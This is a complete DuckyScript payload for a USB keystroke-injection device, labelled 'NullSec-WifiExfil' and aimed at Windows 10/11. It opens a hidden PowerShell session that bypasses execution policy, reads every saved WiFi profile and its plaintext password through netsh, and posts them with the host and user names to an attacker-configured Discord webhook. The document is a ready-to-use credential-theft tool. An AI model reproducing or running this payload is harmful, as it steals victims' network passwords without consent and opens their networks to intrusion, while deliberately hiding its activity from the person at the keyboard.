REM =============================================
REM NullSec-WifiExfil - WiFi Credential Exfiltrator
REM Target: Windows 10/11
REM Author: NullSec (bad-antics)
REM =============================================
REM
REM Extracts all saved WiFi profiles and passwords
REM from Windows and exfiltrates via Discord webhook.
REM Uses netsh wlan for profile enumeration and
REM native PowerShell for exfiltration.
REM
REM CONFIGURE: Set your Discord webhook URL below
REM =============================================

DELAY 500
GUI r
DELAY 800
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$ErrorActionPreference='SilentlyContinue'; $wh='YOUR_WEBHOOK_URL'; $h=$env:COMPUTERNAME; $u=$env:USERNAME; $profiles=(netsh wlan show profiles) | Select-String '\:(.+)$' | ForEach-Object {$_.Matches.Groups[1].Value.Trim()}; $results=@(); foreach($p in $profiles){$detail=netsh wlan show profile name=$p key=clear; $key=($detail | Select-String 'Key Content\s+:\s+(.+)$'); $pw=if($key){$key.Matches.Groups[1].Value.Trim()}else{'(no key)'}; $auth=($detail | Select-String 'Authentication\s+:\s+(.+)$').Matches.Groups[1].Value.Trim(); $results+=\"$p | $auth | $pw\"}; $body=\"**WiFi Credentials - $h ($u)**`n``````n$($results -join \"`n\")`n``````\"; $payload=@{content=$body} | ConvertTo-Json -Depth 2; Invoke-RestMethod -Uri $wh -Method Post -ContentType 'application/json' -Body $payload"
ENTER
